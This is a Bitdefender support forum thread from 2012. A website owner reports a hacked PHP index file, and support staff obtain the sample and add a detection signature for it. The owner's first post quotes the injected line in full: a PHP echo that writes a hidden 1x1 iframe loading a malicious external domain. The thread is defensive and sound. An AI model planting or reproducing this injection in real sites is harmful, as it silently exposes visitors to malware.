Welcome Guest ( Log In | Register )

 
Reply to this topicStart new topic
> Index Injection Iframe Virus, index injected, not detected by bitdefender
Mickael du 93
post May 6 2012, 11:40 AM
Post #1


Newbie


Group: Members
Posts: 4
Joined: 6-May 12
Member No.: 104,392



Hello,

My site was hacked, by this line added at top of the index file.

<?php echo "<iframe src=\"http://sluxxqqgykewolmoli.in/in.cgi?default\" width=1 height=1 frameborder=0></iframe>"; echo "";

And Bitdefender don't detect this !
thank you to add this one
all my pass was changed

Go to the top of the page
 
+Quote Post
Christian
post May 6 2012, 11:45 AM
Post #2


Bitdefender Support
******

Group: Root Admin
Posts: 13,997
Joined: 27-January 08
From: BitDefender HQ
Member No.: 9,374



Hello (IMG:style_emoticons/default/smile.gif)

Welcome to the forums!

Bitdefender detects that website as infected.

https://www.virustotal.com/url/88411726de37...sis/1336300527/

Let me know if you have other questions.

Take care.
Go to the top of the page
 
+Quote Post
Mickael du 93
post May 6 2012, 11:48 AM
Post #3


Newbie


Group: Members
Posts: 4
Joined: 6-May 12
Member No.: 104,392



Oh yes, it was te only one on the list that detect it.

I tought it not detect it because when I scan my index file, it said no virus, but with other url injection I got on another website, it said virus and delete the virus from the file automatically.

Why the index file not detected as virus so like other url injections ?

thank you
Go to the top of the page
 
+Quote Post
Christian
post May 6 2012, 01:59 PM
Post #4


Bitdefender Support
******

Group: Root Admin
Posts: 13,997
Joined: 27-January 08
From: BitDefender HQ
Member No.: 9,374



Hello (IMG:style_emoticons/default/smile.gif)

Could you please send me the infected index file so we can check it out?

Please pack that file in archive with the password infected and upload it on

http://www.sendspace.com

or

http://www.mediafire.com

and send me a PM with the download link.

We will analyze the information you sent and then reply with a possible solution in the shortest time.

Have a nice day.
Go to the top of the page
 
+Quote Post
Mickael du 93
post May 6 2012, 02:15 PM
Post #5


Newbie


Group: Members
Posts: 4
Joined: 6-May 12
Member No.: 104,392



QUOTE (Christian @ May 6 2012, 02:59 PM) *
Could you please send me the infected index file so we can check it out?



PM sent with zip link
ty !
Go to the top of the page
 
+Quote Post
Christian
post May 6 2012, 03:29 PM
Post #6


Bitdefender Support
******

Group: Root Admin
Posts: 13,997
Joined: 27-January 08
From: BitDefender HQ
Member No.: 9,374



Hello (IMG:style_emoticons/default/smile.gif)

I have sent the file to our labs, I will get back to you with a final answer.

Take care.
Go to the top of the page
 
+Quote Post
Fa1c0n
post May 7 2012, 01:43 AM
Post #7


Newbie


Group: Members
Posts: 1
Joined: 7-May 12
Member No.: 104,415



I am interested to hear about this too as i found this code on one of our websites too and have been googling for information.

Please pop an update on this thread when you have one.
Go to the top of the page
 
+Quote Post
Christian
post May 7 2012, 08:24 AM
Post #8


Bitdefender Support
******

Group: Root Admin
Posts: 13,997
Joined: 27-January 08
From: BitDefender HQ
Member No.: 9,374



Hello (IMG:style_emoticons/default/smile.gif)

The file has been signed as Trojan.Iframe.APT Detection will be available after our next update.

File index_php declared INFECTED

Thank you for the sample.
Go to the top of the page
 
+Quote Post
Mickael du 93
post May 7 2012, 08:57 AM
Post #9


Newbie


Group: Members
Posts: 4
Joined: 6-May 12
Member No.: 104,392



Hi Christian,

Great job, now I feel better on my FTP updates :-)

Thank you !!

Go to the top of the page
 
+Quote Post
Christian
post May 7 2012, 10:26 AM
Post #10


Bitdefender Support
******

Group: Root Admin
Posts: 13,997
Joined: 27-January 08
From: BitDefender HQ
Member No.: 9,374



Hi (IMG:style_emoticons/default/smile.gif)

Thank you for your feedback!

Let us know if you need anything from us.

Take care.
Go to the top of the page
 
+Quote Post

Reply to this topicStart new topic
1 User(s) are reading this topic (1 Guests and 0 Anonymous Users)
0 Members:

 



RSS Lo-Fi Version Time is now: 23rd July 2014 - 04:04 AM